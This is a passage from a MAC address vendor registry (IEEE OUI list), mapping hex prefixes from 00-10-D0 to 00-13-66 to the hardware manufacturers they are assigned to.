00-10-D0 (hex) WITCOM, LTD. 00-10-D1 (hex) Top Layer Networks, Inc. 00-10-D2 (hex) NITTO TSUSHINKI CO., LTD 00-10-D3 (hex) GRIPS ELECTRONIC GMBH 00-10-D4 (hex) STORAGE COMPUTER CORPORATION 00-10-D5 (hex) IMASDE CANARIAS, S.A. 00-10-D6 (hex) ITT - A/CD 00-10-D7 (hex) ARGOSY RESEARCH INC. 00-10-D8 (hex) CALISTA 00-10-D9 (hex) IBM JAPAN, FUJISAWA MT+D 00-10-DA (hex) MOTION ENGINEERING, INC. 00-10-DB (hex) Juniper Networks, Inc. 00-10-DC (hex) MICRO-STAR INTERNATIONAL CO., LTD. 00-10-DD (hex) ENABLE SEMICONDUCTOR, INC. 00-10-DE (hex) INTERNATIONAL DATACASTING CORPORATION 00-10-DF (hex) RISE COMPUTER INC. 00-10-E0 (hex) Oracle Corporation 00-10-E1 (hex) S.I. TECH, INC. 00-10-E2 (hex) ArrayComm, Inc. 00-10-E3 (hex) Hewlett-Packard Company 00-10-E4 (hex) NSI CORPORATION 00-10-E5 (hex) SOLECTRON TEXAS 00-10-E6 (hex) APPLIED INTELLIGENT SYSTEMS, INC. 00-10-E7 (hex) BreezeCom 00-10-E8 (hex) TELOCITY, INCORPORATED 00-10-E9 (hex) RAIDTEC LTD. 00-10-EA (hex) ADEPT TECHNOLOGY 00-10-EB (hex) SELSIUS SYSTEMS, INC. 00-10-EC (hex) RPCG, LLC 00-10-ED (hex) SUNDANCE TECHNOLOGY, INC. 00-10-EE (hex) CTI PRODUCTS, INC. 00-10-EF (hex) DBTEL INCORPORATED 00-10-F1 (hex) I-O CORPORATION 00-10-F2 (hex) ANTEC 00-10-F3 (hex) Nexcom International Co., Ltd. 00-10-F4 (hex) Vertical Communications 00-10-F5 (hex) AMHERST SYSTEMS, INC. 00-10-F6 (hex) CISCO SYSTEMS, INC. 00-10-F7 (hex) IRIICHI TECHNOLOGIES Inc. 00-10-F8 (hex) Niikke Techno System Co. Ltd 00-10-F9 (hex) UNIQUE SYSTEMS, INC. 00-10-FA (hex) Apple Inc 00-10-FB (hex) ZIDA TECHNOLOGIES LIMITED 00-10-FC (hex) BROADBAND NETWORKS, INC. 00-10-FD (hex) COCOM A/S 00-10-FE (hex) DIGITAL EQUIPMENT CORPORATION 00-10-FF (hex) CISCO SYSTEMS, INC. 00-11-00 (hex) Schneider Electric 00-11-01 (hex) CET Technologies Pte Ltd 00-11-02 (hex) Aurora Multimedia Corp. 00-11-03 (hex) kawamura electric inc. 00-11-04 (hex) TELEXY 00-11-05 (hex) Sunplus Technology Co., Ltd. 00-11-06 (hex) Siemens NV (Belgium) 00-11-07 (hex) RGB Networks Inc. 00-11-08 (hex) Orbital Data Corporation 00-11-09 (hex) Micro-Star International 00-11-0A (hex) Hewlett-Packard Company 00-11-0B (hex) Franklin Technology Systems 00-11-0C (hex) Atmark Techno, Inc. 00-11-0D (hex) SANBlaze Technology, Inc. 00-11-0E (hex) Tsurusaki Sealand Transportation Co. Ltd. 00-11-0F (hex) netplat,Inc. 00-11-10 (hex) Maxanna Technology Co., Ltd. 00-11-11 (hex) Intel Corporation 00-11-12 (hex) Honeywell CMSS 00-11-13 (hex) Fraunhofer FOKUS 00-11-14 (hex) EverFocus Electronics Corp. 00-11-15 (hex) EPIN Technologies, Inc. 00-11-16 (hex) COTEAU VERT CO., LTD. 00-11-17 (hex) CESNET 00-11-18 (hex) BLX IC Design Corp., Ltd. 00-11-19 (hex) Solteras, Inc. 00-11-1A (hex) Motorola Mobility, Inc. 00-11-1B (hex) Targa Systems Div L-3 Communications Canada 00-11-1C (hex) Pleora Technologies Inc. 00-11-1D (hex) Hectrix Limited 00-11-1E (hex) EPSG (Ethernet Powerlink Standardization Group) 00-11-1F (hex) Doremi Labs, Inc. 00-11-20 (hex) Cisco Systems 00-11-21 (hex) Cisco Systems 00-11-22 (hex) CIMSYS Inc 00-11-23 (hex) Appointech, Inc. 00-11-24 (hex) Apple Computer 00-11-25 (hex) IBM Corp 00-11-26 (hex) Venstar Inc. 00-11-27 (hex) TASI, Inc 00-11-28 (hex) Streamit 00-11-29 (hex) Paradise Datacom Ltd. 00-11-2A (hex) Niko NV 00-11-2B (hex) NetModule AG 00-11-2C (hex) IZT GmbH 00-11-2D (hex) iPulse Systems 00-11-2E (hex) CEICOM 00-11-2F (hex) ASUSTek Computer Inc. 00-11-30 (hex) Allied Telesis (Hong Kong) Ltd. 00-11-31 (hex) UNATECH. CO.,LTD 00-11-32 (hex) Synology Incorporated 00-11-33 (hex) Siemens Austria SIMEA 00-11-34 (hex) MediaCell, Inc. 00-11-35 (hex) Grandeye Ltd 00-11-36 (hex) Goodrich Sensor Systems 00-11-37 (hex) AICHI ELECTRIC CO., LTD. 00-11-38 (hex) TAISHIN CO., LTD. 00-11-39 (hex) STOEBER ANTRIEBSTECHNIK GmbH + Co. KG. 00-11-3A (hex) SHINBORAM 00-11-3B (hex) Micronet Communications Inc. 00-11-3C (hex) Micronas GmbH 00-11-3D (hex) KN SOLTEC CO.,LTD. 00-11-3E (hex) JL Corporation 00-11-3F (hex) Alcatel DI 00-11-40 (hex) Nanometrics Inc. 00-11-41 (hex) GoodMan Corporation 00-11-42 (hex) e-SMARTCOM INC. 00-11-43 (hex) DELL INC. 00-11-44 (hex) Assurance Technology Corp 00-11-45 (hex) ValuePoint Networks 00-11-46 (hex) Telecard-Pribor Ltd 00-11-47 (hex) Secom-Industry co.LTD. 00-11-48 (hex) Prolon Control Systems 00-11-49 (hex) Proliphix Inc. 00-11-4A (hex) KAYABA INDUSTRY Co,.Ltd. 00-11-4B (hex) Francotyp-Postalia GmbH 00-11-4C (hex) caffeina applied research ltd. 00-11-4D (hex) Atsumi Electric Co.,LTD. 00-11-4E (hex) 690885 Ontario Inc. 00-11-4F (hex) US Digital Television, Inc 00-11-50 (hex) Belkin Corporation 00-11-51 (hex) Mykotronx 00-11-52 (hex) Eidsvoll Electronics AS 00-11-53 (hex) Trident Tek, Inc. 00-11-54 (hex) Webpro Technologies Inc. 00-11-55 (hex) Sevis Systems 00-11-56 (hex) Pharos Systems NZ 00-11-57 (hex) OF Networks Co., Ltd. 00-11-58 (hex) Nortel Networks 00-11-59 (hex) MATISSE NETWORKS INC 00-11-5A (hex) Ivoclar Vivadent AG 00-11-5B (hex) Elitegroup Computer System Co. (ECS) 00-11-5C (hex) Cisco 00-11-5D (hex) Cisco 00-11-5E (hex) ProMinent Dosiertechnik GmbH 00-11-5F (hex) ITX Security Co., Ltd. 00-11-60 (hex) ARTDIO Company Co., LTD 00-11-61 (hex) NetStreams, LLC 00-11-62 (hex) STAR MICRONICS CO.,LTD. 00-11-63 (hex) SYSTEM SPA DEPT. ELECTRONICS 00-11-64 (hex) ACARD Technology Corp. 00-11-65 (hex) Znyx Networks 00-11-66 (hex) Taelim Electronics Co., Ltd. 00-11-67 (hex) Integrated System Solution Corp. 00-11-68 (hex) HomeLogic LLC 00-11-69 (hex) EMS Satcom 00-11-6A (hex) Domo Ltd 00-11-6B (hex) Digital Data Communications Asia Co.,Ltd 00-11-6C (hex) Nanwang Multimedia Inc.,Ltd 00-11-6D (hex) American Time and Signal 00-11-6E (hex) PePLink Ltd. 00-11-6F (hex) Netforyou Co., LTD. 00-11-70 (hex) GSC SRL 00-11-71 (hex) DEXTER Communications, Inc. 00-11-72 (hex) COTRON CORPORATION 00-11-73 (hex) SMART Modular Technologies 00-11-74 (hex) Wibhu Technologies, Inc. 00-11-75 (hex) PathScale, Inc. 00-11-76 (hex) Intellambda Systems, Inc. 00-11-77 (hex) Coaxial Networks, Inc. 00-11-78 (hex) Chiron Technology Ltd 00-11-79 (hex) Singular Technology Co. Ltd. 00-11-7A (hex) Singim International Corp. 00-11-7B (hex) Büchi Labortechnik AG 00-11-7C (hex) e-zy.net 00-11-7D (hex) ZMD America, Inc. 00-11-7E (hex) Progeny Inc. 00-11-7F (hex) Neotune Information Technology Corporation,.LTD 00-11-80 (hex) Motorola Mobility, Inc. 00-11-81 (hex) InterEnergy Co.Ltd, 00-11-82 (hex) IMI Norgren Ltd 00-11-83 (hex) Datalogic Mobile, Inc. 00-11-84 (hex) Humo Laboratory,Ltd. 00-11-85 (hex) Hewlett-Packard Company 00-11-86 (hex) Prime Systems, Inc. 00-11-87 (hex) Category Solutions, Inc 00-11-88 (hex) Enterasys 00-11-89 (hex) Aerotech Inc 00-11-8A (hex) Viewtran Technology Limited 00-11-8B (hex) Alcatel-Lucent, Enterprise Business Group 00-11-8C (hex) Missouri Department of Transportation 00-11-8D (hex) Hanchang System Corp. 00-11-8E (hex) Halytech Mace 00-11-8F (hex) EUTECH INSTRUMENTS PTE. LTD. 00-11-90 (hex) Digital Design Corporation 00-11-91 (hex) CTS-Clima Temperatur Systeme GmbH 00-11-92 (hex) Cisco Systems 00-11-93 (hex) Cisco Systems 00-11-94 (hex) Chi Mei Communication Systems, Inc. 00-11-95 (hex) D-Link Corporation 00-11-96 (hex) Actuality Systems, Inc. 00-11-97 (hex) Monitoring Technologies Limited 00-11-98 (hex) Prism Media Products Limited 00-11-99 (hex) 2wcom GmbH 00-11-9A (hex) Alkeria srl 00-11-9B (hex) Telesynergy Research Inc. 00-11-9C (hex) EP&T Energy 00-11-9D (hex) Diginfo Technology Corporation 00-11-9E (hex) Solectron Brazil 00-11-9F (hex) Nokia Danmark A/S 00-11-A0 (hex) Vtech Engineering Canada Ltd 00-11-A1 (hex) VISION NETWARE CO.,LTD 00-11-A2 (hex) Manufacturing Technology Inc 00-11-A3 (hex) LanReady Technologies Inc. 00-11-A4 (hex) JStream Technologies Inc. 00-11-A5 (hex) Fortuna Electronic Corp. 00-11-A6 (hex) Sypixx Networks 00-11-A7 (hex) Infilco Degremont Inc. 00-11-A8 (hex) Quest Technologies 00-11-A9 (hex) MOIMSTONE Co., LTD 00-11-AA (hex) Uniclass Technology, Co., LTD 00-11-AB (hex) TRUSTABLE TECHNOLOGY CO.,LTD. 00-11-AC (hex) Simtec Electronics 00-11-AD (hex) Shanghai Ruijie Technology 00-11-AE (hex) Motorola Mobility, Inc. 00-11-AF (hex) Medialink-i,Inc 00-11-B0 (hex) Fortelink Inc. 00-11-B1 (hex) BlueExpert Technology Corp. 00-11-B2 (hex) 2001 Technology Inc. 00-11-B3 (hex) YOSHIMIYA CO.,LTD. 00-11-B4 (hex) Westermo Teleindustri AB 00-11-B5 (hex) Shenzhen Powercom Co.,Ltd 00-11-B6 (hex) Open Systems International 00-11-B7 (hex) Octalix B.V. 00-11-B8 (hex) Liebherr - Elektronik GmbH 00-11-B9 (hex) Inner Range Pty. Ltd. 00-11-BA (hex) Elexol Pty Ltd 00-11-BB (hex) Cisco Systems 00-11-BC (hex) Cisco Systems 00-11-BD (hex) Bombardier Transportation 00-11-BE (hex) AGP Telecom Co. Ltd 00-11-BF (hex) AESYS S.p.A. 00-11-C0 (hex) Aday Technology Inc 00-11-C1 (hex) 4P MOBILE DATA PROCESSING 00-11-C2 (hex) United Fiber Optic Communication 00-11-C3 (hex) Transceiving System Technology Corporation 00-11-C4 (hex) Terminales de Telecomunicacion Terrestre, S.L. 00-11-C5 (hex) TEN Technology 00-11-C6 (hex) Seagate Technology LLC 00-11-C7 (hex) Raymarine UK Ltd 00-11-C8 (hex) Powercom Co., Ltd. 00-11-C9 (hex) MTT Corporation 00-11-CA (hex) Long Range Systems, Inc. 00-11-CB (hex) Jacobsons AB 00-11-CC (hex) Guangzhou Jinpeng Group Co.,Ltd. 00-11-CD (hex) Axsun Technologies 00-11-CE (hex) Ubisense Limited 00-11-CF (hex) Thrane & Thrane A/S 00-11-D0 (hex) Tandberg Data ASA 00-11-D1 (hex) Soft Imaging System GmbH 00-11-D2 (hex) Perception Digital Ltd 00-11-D3 (hex) NextGenTel Holding ASA 00-11-D4 (hex) NetEnrich, Inc 00-11-D5 (hex) Hangzhou Sunyard System Engineering Co.,Ltd. 00-11-D6 (hex) HandEra, Inc. 00-11-D7 (hex) eWerks Inc 00-11-D8 (hex) ASUSTek Computer Inc. 00-11-D9 (hex) TiVo 00-11-DA (hex) Vivaas Technology Inc. 00-11-DB (hex) Land-Cellular Corporation 00-11-DC (hex) Glunz & Jensen 00-11-DD (hex) FROMUS TEC. Co., Ltd. 00-11-DE (hex) EURILOGIC 00-11-DF (hex) Current Energy 00-11-E0 (hex) U-MEDIA Communications, Inc. 00-11-E1 (hex) Arcelik A.S 00-11-E2 (hex) Hua Jung Components Co., Ltd. 00-11-E3 (hex) Thomson, Inc. 00-11-E4 (hex) Danelec Electronics A/S 00-11-E5 (hex) KCodes Corporation 00-11-E6 (hex) Scientific Atlanta 00-11-E7 (hex) WORLDSAT - Texas de France 00-11-E8 (hex) Tixi.Com 00-11-E9 (hex) STARNEX CO., LTD. 00-11-EA (hex) IWICS Inc. 00-11-EB (hex) Innovative Integration 00-11-EC (hex) AVIX INC. 00-11-ED (hex) 802 Global 00-11-EE (hex) Estari, Inc. 00-11-EF (hex) Conitec Datensysteme GmbH 00-11-F0 (hex) Wideful Limited 00-11-F1 (hex) QinetiQ Ltd 00-11-F2 (hex) Institute of Network Technologies 00-11-F3 (hex) NeoMedia Europe AG 00-11-F4 (hex) woori-net 00-11-F5 (hex) ASKEY COMPUTER CORP. 00-11-F6 (hex) Asia Pacific Microsystems , Inc. 00-11-F7 (hex) Shenzhen Forward Industry Co., Ltd 00-11-F8 (hex) AIRAYA Corp 00-11-F9 (hex) Nortel Networks 00-11-FA (hex) Rane Corporation 00-11-FB (hex) Heidelberg Engineering GmbH 00-11-FC (hex) HARTING Electric Gmbh & Co.KG 00-11-FD (hex) KORG INC. 00-11-FE (hex) Keiyo System Research, Inc. 00-11-FF (hex) Digitro Tecnologia Ltda 00-12-00 (hex) Cisco 00-12-01 (hex) Cisco 00-12-02 (hex) Decrane Aerospace - Audio International Inc. 00-12-03 (hex) Activ Networks 00-12-04 (hex) u10 Networks, Inc. 00-12-05 (hex) Terrasat Communications, Inc. 00-12-06 (hex) iQuest (NZ) Ltd 00-12-07 (hex) Head Strong International Limited 00-12-08 (hex) Gantner Instruments GmbH 00-12-09 (hex) Fastrax Ltd 00-12-0A (hex) Emerson Electric GmbH & Co. OHG 00-12-0B (hex) Chinasys Technologies Limited 00-12-0C (hex) CE-Infosys Pte Ltd 00-12-0D (hex) Advanced Telecommunication Technologies, Inc. 00-12-0E (hex) AboCom 00-12-0F (hex) IEEE 802.3 00-12-10 (hex) WideRay Corp 00-12-11 (hex) Protechna Herbst GmbH & Co. KG 00-12-12 (hex) PLUS Corporation 00-12-13 (hex) Metrohm AG 00-12-14 (hex) Koenig & Bauer AG 00-12-15 (hex) iStor Networks, Inc. 00-12-16 (hex) ICP Internet Communication Payment AG 00-12-17 (hex) Cisco-Linksys, LLC 00-12-18 (hex) ARUZE Corporation 00-12-19 (hex) Ahead Communication Systems Inc 00-12-1A (hex) Techno Soft Systemnics Inc. 00-12-1B (hex) Sound Devices, LLC 00-12-1C (hex) PARROT S.A. 00-12-1D (hex) Netfabric Corporation 00-12-1E (hex) Juniper Networks, Inc. 00-12-1F (hex) Harding Intruments 00-12-20 (hex) Cadco Systems 00-12-21 (hex) B.Braun Melsungen AG 00-12-22 (hex) Skardin (UK) Ltd 00-12-23 (hex) Pixim 00-12-24 (hex) NexQL Corporation 00-12-25 (hex) Motorola Mobility, Inc. 00-12-26 (hex) Japan Direx Corporation 00-12-27 (hex) Franklin Electric Co., Inc. 00-12-28 (hex) Data Ltd. 00-12-29 (hex) BroadEasy Technologies Co.,Ltd 00-12-2A (hex) VTech Telecommunications Ltd. 00-12-2B (hex) Virbiage Pty Ltd 00-12-2C (hex) Soenen Controls N.V. 00-12-2D (hex) SiNett Corporation 00-12-2E (hex) Signal Technology - AISD 00-12-2F (hex) Sanei Electric Inc. 00-12-30 (hex) Picaso Infocommunication CO., LTD. 00-12-31 (hex) Motion Control Systems, Inc. 00-12-32 (hex) LeWiz Communications Inc. 00-12-33 (hex) JRC TOKKI Co.,Ltd. 00-12-34 (hex) Camille Bauer 00-12-35 (hex) Andrew Corporation 00-12-36 (hex) ConSentry Networks 00-12-37 (hex) Texas Instruments 00-12-38 (hex) SetaBox Technology Co., Ltd. 00-12-39 (hex) S Net Systems Inc. 00-12-3A (hex) Posystech Inc., Co. 00-12-3B (hex) KeRo Systems ApS 00-12-3C (hex) Second Rule LLC 00-12-3D (hex) GES 00-12-3E (hex) ERUNE technology Co., Ltd. 00-12-3F (hex) Dell Inc 00-12-40 (hex) AMOI ELECTRONICS CO.,LTD 00-12-41 (hex) a2i marketing center 00-12-42 (hex) Millennial Net 00-12-43 (hex) Cisco 00-12-44 (hex) Cisco 00-12-45 (hex) Zellweger Analytics, Inc. 00-12-46 (hex) T.O.M TECHNOLOGY INC.. 00-12-47 (hex) Samsung Electronics Co., Ltd. 00-12-48 (hex) EMC Corporation (Kashya) 00-12-49 (hex) Delta Elettronica S.p.A. 00-12-4A (hex) Dedicated Devices, Inc. 00-12-4B (hex) Texas Instruments 00-12-4C (hex) BBWM Corporation 00-12-4D (hex) Inducon BV 00-12-4E (hex) XAC AUTOMATION CORP. 00-12-4F (hex) Tyco Thermal Controls LLC. 00-12-50 (hex) Tokyo Aircaft Instrument Co., Ltd. 00-12-51 (hex) SILINK 00-12-52 (hex) Citronix, LLC 00-12-53 (hex) AudioDev AB 00-12-54 (hex) Spectra Technologies Holdings Company Ltd 00-12-55 (hex) NetEffect Incorporated 00-12-56 (hex) LG INFORMATION & COMM. 00-12-57 (hex) LeapComm Communication Technologies Inc. 00-12-58 (hex) Activis Polska 00-12-59 (hex) THERMO ELECTRON KARLSRUHE 00-12-5A (hex) Microsoft Corporation 00-12-5B (hex) KAIMEI ELECTRONI 00-12-5C (hex) Green Hills Software, Inc. 00-12-5D (hex) CyberNet Inc. 00-12-5E (hex) CAEN 00-12-5F (hex) AWIND Inc. 00-12-60 (hex) Stanton Magnetics,inc. 00-12-61 (hex) Adaptix, Inc 00-12-62 (hex) Nokia Danmark A/S 00-12-63 (hex) Data Voice Technologies GmbH 00-12-64 (hex) daum electronic gmbh 00-12-65 (hex) Enerdyne Technologies, Inc. 00-12-66 (hex) Swisscom Hospitality Services SA 00-12-67 (hex) Matsushita Electronic Components Co., Ltd. 00-12-68 (hex) IPS d.o.o. 00-12-69 (hex) Value Electronics 00-12-6A (hex) OPTOELECTRONICS Co., Ltd. 00-12-6B (hex) Ascalade Communications Limited 00-12-6C (hex) Visonic Ltd. 00-12-6D (hex) University of California, Berkeley 00-12-6E (hex) Seidel Elektronik GmbH Nfg.KG 00-12-6F (hex) Rayson Technology Co., Ltd. 00-12-70 (hex) NGES Denro Systems 00-12-71 (hex) Measurement Computing Corp 00-12-72 (hex) Redux Communications Ltd. 00-12-73 (hex) Stoke Inc 00-12-74 (hex) NIT lab 00-12-75 (hex) Sentilla Corporation 00-12-76 (hex) CG Power Systems Ireland Limited 00-12-77 (hex) Korenix Technologies Co., Ltd. 00-12-78 (hex) International Bar Code 00-12-79 (hex) Hewlett-Packard Company 00-12-7A (hex) Sanyu Industry Co.,Ltd. Midori-ku Hakusan1-11-11 00-12-7B (hex) VIA Networking Technologies, Inc. 00-12-7C (hex) SWEGON AB 00-12-7D (hex) MobileAria 00-12-7E (hex) Digital Lifestyles Group, Inc. 00-12-7F (hex) Cisco 00-12-80 (hex) Cisco 00-12-81 (hex) March Networks S.p.A. 00-12-82 (hex) Qovia 00-12-83 (hex) Nortel Networks 00-12-84 (hex) Lab33 Srl 00-12-85 (hex) Gizmondo Europe Ltd 00-12-86 (hex) ENDEVCO CORP 00-12-87 (hex) Digital Everywhere Unterhaltungselektronik GmbH 00-12-88 (hex) 2Wire, Inc 00-12-89 (hex) Advance Sterilization Products 00-12-8A (hex) Motorola Mobility, Inc. 00-12-8B (hex) Sensory Networks Inc 00-12-8C (hex) Woodward Governor 00-12-8D (hex) STB Datenservice GmbH 00-12-8E (hex) Q-Free ASA 00-12-8F (hex) Montilio 00-12-90 (hex) KYOWA Electric & Machinery Corp. 00-12-91 (hex) KWS Computersysteme GmbH 00-12-92 (hex) Griffin Technology 00-12-93 (hex) GE Energy 00-12-94 (hex) SUMITOMO ELECTRIC DEVICE INNOVATIONS, INC 00-12-95 (hex) Aiware Inc. 00-12-96 (hex) Addlogix 00-12-97 (hex) O2Micro, Inc. 00-12-98 (hex) MICO ELECTRIC(SHENZHEN) LIMITED 00-12-99 (hex) Ktech Telecommunications Inc 00-12-9A (hex) IRT Electronics Pty Ltd 00-12-9B (hex) E2S Electronic Engineering Solutions, S.L. 00-12-9C (hex) Yulinet 00-12-9D (hex) First International Computer do Brasil 00-12-9E (hex) Surf Communications Inc. 00-12-9F (hex) RAE Systems, Inc. 00-12-A0 (hex) NeoMeridian Sdn Bhd 00-12-A1 (hex) BluePacket Communications Co., Ltd. 00-12-A2 (hex) VITA 00-12-A3 (hex) Trust International B.V. 00-12-A4 (hex) ThingMagic, LLC 00-12-A5 (hex) Stargen, Inc. 00-12-A6 (hex) Dolby Australia 00-12-A7 (hex) ISR TECHNOLOGIES Inc 00-12-A8 (hex) intec GmbH 00-12-A9 (hex) 3Com Ltd 00-12-AA (hex) IEE, Inc. 00-12-AB (hex) WiLife, Inc. 00-12-AC (hex) ONTIMETEK INC. 00-12-AD (hex) IDS GmbH 00-12-AE (hex) HLS HARD-LINE Solutions Inc. 00-12-AF (hex) ELPRO Technologies 00-12-B0 (hex) Efore Oyj (Plc) 00-12-B1 (hex) Dai Nippon Printing Co., Ltd 00-12-B2 (hex) AVOLITES LTD. 00-12-B3 (hex) Advance Wireless Technology Corp. 00-12-B4 (hex) Work Microwave GmbH 00-12-B5 (hex) Vialta, Inc. 00-12-B6 (hex) Santa Barbara Infrared, Inc. 00-12-B7 (hex) PTW Freiburg 00-12-B8 (hex) G2 Microsystems 00-12-B9 (hex) Fusion Digital Technology 00-12-BA (hex) FSI Systems, Inc. 00-12-BB (hex) Telecommunications Industry Association TR-41 Committee 00-12-BC (hex) Echolab LLC 00-12-BD (hex) Avantec Manufacturing Limited 00-12-BE (hex) Astek Corporation 00-12-BF (hex) Arcadyan Technology Corporation 00-12-C0 (hex) HotLava Systems, Inc. 00-12-C1 (hex) Check Point Software Technologies 00-12-C2 (hex) Apex Electronics Factory 00-12-C3 (hex) WIT S.A. 00-12-C4 (hex) Viseon, Inc. 00-12-C5 (hex) V-Show Technology (China) Co.,Ltd 00-12-C6 (hex) TGC America, Inc 00-12-C7 (hex) SECURAY Technologies Ltd.Co. 00-12-C8 (hex) Perfect tech 00-12-C9 (hex) Motorola Mobility, Inc. 00-12-CA (hex) Mechatronic Brick Aps 00-12-CB (hex) CSS Inc. 00-12-CC (hex) Bitatek CO., LTD 00-12-CD (hex) ASEM SpA 00-12-CE (hex) Advanced Cybernetics Group 00-12-CF (hex) Accton Technology Corporation 00-12-D0 (hex) Gossen-Metrawatt-GmbH 00-12-D1 (hex) Texas Instruments Inc 00-12-D2 (hex) Texas Instruments 00-12-D3 (hex) Zetta Systems, Inc. 00-12-D4 (hex) Princeton Technology, Ltd 00-12-D5 (hex) Motion Reality Inc. 00-12-D6 (hex) Jiangsu Yitong High-Tech Co.,Ltd 00-12-D7 (hex) Invento Networks, Inc. 00-12-D8 (hex) International Games System Co., Ltd. 00-12-D9 (hex) Cisco Systems 00-12-DA (hex) Cisco Systems 00-12-DB (hex) ZIEHL industrie-elektronik GmbH + Co KG 00-12-DC (hex) SunCorp Industrial Limited 00-12-DD (hex) Shengqu Information Technology (Shanghai) Co., Ltd. 00-12-DE (hex) Radio Components Sweden AB 00-12-DF (hex) Novomatic AG 00-12-E0 (hex) Codan Limited 00-12-E1 (hex) Alliant Networks, Inc 00-12-E2 (hex) ALAXALA Networks Corporation 00-12-E3 (hex) Agat-RT, Ltd. 00-12-E4 (hex) ZIEHL industrie-electronik GmbH + Co KG 00-12-E5 (hex) Time America, Inc. 00-12-E6 (hex) SPECTEC COMPUTER CO., LTD. 00-12-E7 (hex) Projectek Networking Electronics Corp. 00-12-E8 (hex) Fraunhofer IMS 00-12-E9 (hex) Abbey Systems Ltd 00-12-EA (hex) Trane 00-12-EB (hex) R2DI, LLC 00-12-EC (hex) Movacolor b.v. 00-12-ED (hex) AVG Advanced Technologies 00-12-EE (hex) Sony Ericsson Mobile Communications AB 00-12-EF (hex) OneAccess SA 00-12-F0 (hex) Intel Corporate 00-12-F1 (hex) IFOTEC 00-12-F2 (hex) Brocade Communications Systems, Inc 00-12-F3 (hex) connectBlue AB 00-12-F4 (hex) Belco International Co.,Ltd. 00-12-F5 (hex) Imarda New Zealand Limited 00-12-F6 (hex) MDK CO.,LTD. 00-12-F7 (hex) Xiamen Xinglian Electronics Co., Ltd. 00-12-F8 (hex) WNI Resources, LLC 00-12-F9 (hex) URYU SEISAKU, LTD. 00-12-FA (hex) THX LTD 00-12-FB (hex) Samsung Electronics 00-12-FC (hex) PLANET System Co.,LTD 00-12-FD (hex) OPTIMUS IC S.A. 00-12-FE (hex) Lenovo Mobile Communication Technology Ltd. 00-12-FF (hex) Lely Industries N.V. 00-13-00 (hex) IT-FACTORY, INC. 00-13-01 (hex) IronGate S.L. 00-13-02 (hex) Intel Corporate 00-13-03 (hex) GateConnect Technologies GmbH 00-13-04 (hex) Flaircomm Technologies Co. LTD 00-13-05 (hex) Epicom, Inc. 00-13-06 (hex) Always On Wireless 00-13-07 (hex) Paravirtual Corporation 00-13-08 (hex) Nuvera Fuel Cells 00-13-09 (hex) Ocean Broadband Networks 00-13-0A (hex) Nortel 00-13-0B (hex) Mextal B.V. 00-13-0C (hex) HF System Corporation 00-13-0D (hex) GALILEO AVIONICA 00-13-0E (hex) Focusrite Audio Engineering Limited 00-13-0F (hex) EGEMEN Bilgisayar Muh San ve Tic LTD STI 00-13-10 (hex) Cisco-Linksys, LLC 00-13-11 (hex) ARRIS International 00-13-12 (hex) Amedia Networks Inc. 00-13-13 (hex) GuangZhou Post & Telecom Equipment ltd 00-13-14 (hex) Asiamajor Inc. 00-13-15 (hex) SONY Computer Entertainment inc, 00-13-16 (hex) L-S-B Broadcast Technologies GmbH 00-13-17 (hex) GN Netcom as 00-13-18 (hex) DGSTATION Co., Ltd. 00-13-19 (hex) Cisco Systems 00-13-1A (hex) Cisco Systems 00-13-1B (hex) BeCell Innovations Corp. 00-13-1C (hex) LiteTouch, Inc. 00-13-1D (hex) Scanvaegt International A/S 00-13-1E (hex) Peiker acustic GmbH & Co. KG 00-13-1F (hex) NxtPhase T&D, Corp. 00-13-20 (hex) Intel Corporate 00-13-21 (hex) Hewlett-Packard Company 00-13-22 (hex) DAQ Electronics, Inc. 00-13-23 (hex) Cap Co., Ltd. 00-13-24 (hex) Schneider Electric Ultra Terminal 00-13-25 (hex) Cortina Systems Inc 00-13-26 (hex) ECM Systems Ltd 00-13-27 (hex) Data Acquisitions limited 00-13-28 (hex) Westech Korea Inc., 00-13-29 (hex) VSST Co., LTD 00-13-2A (hex) Sitronics Telecom Solutions 00-13-2B (hex) Phoenix Digital 00-13-2C (hex) MAZ Brandenburg GmbH 00-13-2D (hex) iWise Communications 00-13-2E (hex) ITian Coporation 00-13-2F (hex) Interactek 00-13-30 (hex) EURO PROTECTION SURVEILLANCE 00-13-31 (hex) CellPoint Connect 00-13-32 (hex) Beijing Topsec Network Security Technology Co., Ltd. 00-13-33 (hex) BaudTec Corporation 00-13-34 (hex) Arkados, Inc. 00-13-35 (hex) VS Industry Berhad 00-13-36 (hex) Tianjin 712 Communication Broadcasting co., ltd. 00-13-37 (hex) Orient Power Home Network Ltd. 00-13-38 (hex) FRESENIUS-VIAL 00-13-39 (hex) EL-ME AG 00-13-3A (hex) VadaTech Inc. 00-13-3B (hex) Speed Dragon Multimedia Limited 00-13-3C (hex) QUINTRON SYSTEMS INC. 00-13-3D (hex) Micro Memory Curtiss Wright Co 00-13-3E (hex) MetaSwitch 00-13-3F (hex) Eppendorf Instrumente GmbH 00-13-40 (hex) AD.EL s.r.l. 00-13-41 (hex) Shandong New Beiyang Information Technology Co.,Ltd 00-13-42 (hex) Vision Research, Inc. 00-13-43 (hex) Matsushita Electronic Components (Europe) GmbH 00-13-44 (hex) Fargo Electronics Inc. 00-13-45 (hex) Eaton Corporation 00-13-46 (hex) D-Link Corporation 00-13-47 (hex) BlueTree Wireless Data Inc. 00-13-48 (hex) Artila Electronics Co., Ltd. 00-13-49 (hex) ZyXEL Communications Corporation 00-13-4A (hex) Engim, Inc. 00-13-4B (hex) ToGoldenNet Technology Inc. 00-13-4C (hex) YDT Technology International 00-13-4D (hex) IPC systems 00-13-4E (hex) Valox Systems, Inc. 00-13-4F (hex) Tranzeo Wireless Technologies Inc. 00-13-50 (hex) Silver Spring Networks, Inc 00-13-51 (hex) Niles Audio Corporation 00-13-52 (hex) Naztec, Inc. 00-13-53 (hex) HYDAC Filtertechnik GMBH 00-13-54 (hex) Zcomax Technologies, Inc. 00-13-55 (hex) TOMEN Cyber-business Solutions, Inc. 00-13-56 (hex) FLIR Radiation GmbH 00-13-57 (hex) Soyal Technology Co., Ltd. 00-13-58 (hex) Realm Systems, Inc. 00-13-59 (hex) ProTelevision Technologies A/S 00-13-5A (hex) Project T&E Limited 00-13-5B (hex) PanelLink Cinema, LLC 00-13-5C (hex) OnSite Systems, Inc. 00-13-5D (hex) NTTPC Communications, Inc. 00-13-5E (hex) EAB/RWI/K 00-13-5F (hex) Cisco Systems 00-13-60 (hex) Cisco Systems 00-13-61 (hex) Biospace Co., Ltd. 00-13-62 (hex) ShinHeung Precision Co., Ltd. 00-13-63 (hex) Verascape, Inc. 00-13-64 (hex) Paradigm Technology Inc.. 00-13-65 (hex) Nortel 00-13-66 (hex) Neturity 